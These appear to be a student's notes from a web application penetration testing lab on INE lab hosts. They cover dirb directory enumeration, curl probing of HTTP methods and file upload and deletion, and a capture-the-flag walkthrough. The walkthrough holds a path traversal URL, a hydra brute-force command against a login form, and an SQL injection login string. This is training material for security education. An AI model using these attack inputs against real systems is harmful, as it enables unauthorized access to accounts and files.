## Inspecting the web application.
URL: http://demo.ine.local/login.php

Step 2: Identify the endpoint which processes the form fields. Right-click on the web page and click on the view source.

The parameters are passed in a POST request to the same "login.php" page.

Login to the web application with the provided credentials.

Username: john Password: password

After login instead of the login link "Welcome John" message is displayed.

Step 4: Follow the remaining link. Click on the blog post.

The Web pages which can be accessed by following the links are index.php, login.php and post.php.

## Using dirb to identify hidden directories.

Commands:

dirb http://demo.ine.local

The directories which are present on the server are css, img, js, mail, uploads and vendor.

## Interacting with the home page with CURL.

Step 1: Sending GET request:

Commands:

curl -X GET demo.ine.local

curl -I demo.ine.local

Step 3: Sending OPTIONS request.

Commands:

curl -X OPTIONS demo.ine.local -v

The supported methods are GET, HEAD and OPTIONS. Accessing the web page should produce an error.

Step 4: Sending POST Request.

Commands:

curl -X POST demo.ine.local

Step 5: Sending PUT Request

Commands:

curl -XPUT demo.ine.local

Interacting with the login.php page with CURL.
## Interacting with the login.php page with CURL.

Step 1: Sending OPTIONS Request

Commands:

curl -X OPTIONS demo.ine.local/login.php -v
The allowed methods include: GET,POST,HEAD,OPTIONS.

Step 2: Sending POST Request.

Commands:

curl -X POST demo.ine.local/login.php

Step 3: Passing the username and password to the login.php page.

Command:

curl -X POST demo.ine.local/login.php -d "name=john&password=password" -v
The login page returned a different response than before. The response contains 302 redirects.

curl -X OPTIONS demo.ine.local/post.php -v

## Interacting with the uploads directory

Step 1: Checking the content of /uploads directory.

URL: http://demo.ine.local/uploads

Step 2: Sending OPTIONS request to /uploads directory.

Commands:

curl -X OPTIONS demo.ine.local/uploads/
curl -X OPTIONS demo.ine.local/uploads/ -v

Step 3: Uploading a file with the PUT method.

Commands:

echo "Hello World" > hello.txt
curl demo.ine.local/uploads/ --upload-file hello.txt

Step 5: Using the DELETE method to delete the file.

Command:

curl -XDELETE demo.ine.local/uploads/hello.txt
## Interacting with the web page with Burp Suite
try head/options

## Passive Crawling with Burp Suite
nmap -sS -sV demo.ine.local
firefox http://demo.ine.local
Browse the Mutillidae application and burp will automatically crawl the visited pages.
set up foxy proxy and view it in burp

## Web Application Penetration Testing CTF 1

Flag 1: Sometimes, important files are hidden in plain sight. Check the root ('/') directory for a file named 'flag.txt' that might hold the key to the first flag.
 http://target.ine.local/page.php?file=/../flag.txt

Flag 2: Explore the structure of the server's directories. Enumeration might reveal hidden treasures.
dirb http://target.ine.local
http://target.ine.local/secured
http://target1.ine.local/login

Flag 3: The login form seems a bit weak. Trying out different combinations might just reveal the next flag.
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /root/Desktop/wordlists/100-common-passwords.txt target.ine.local http-post-form “/login:username=^USER^&password=^PASS^:Invalid username or password”


Flag 4: The login form behaves oddly with unexpected inputs. Think of injection techniques to access the 'admin' account and find the flag.

Username: admin’ OR ‘1=1’ —
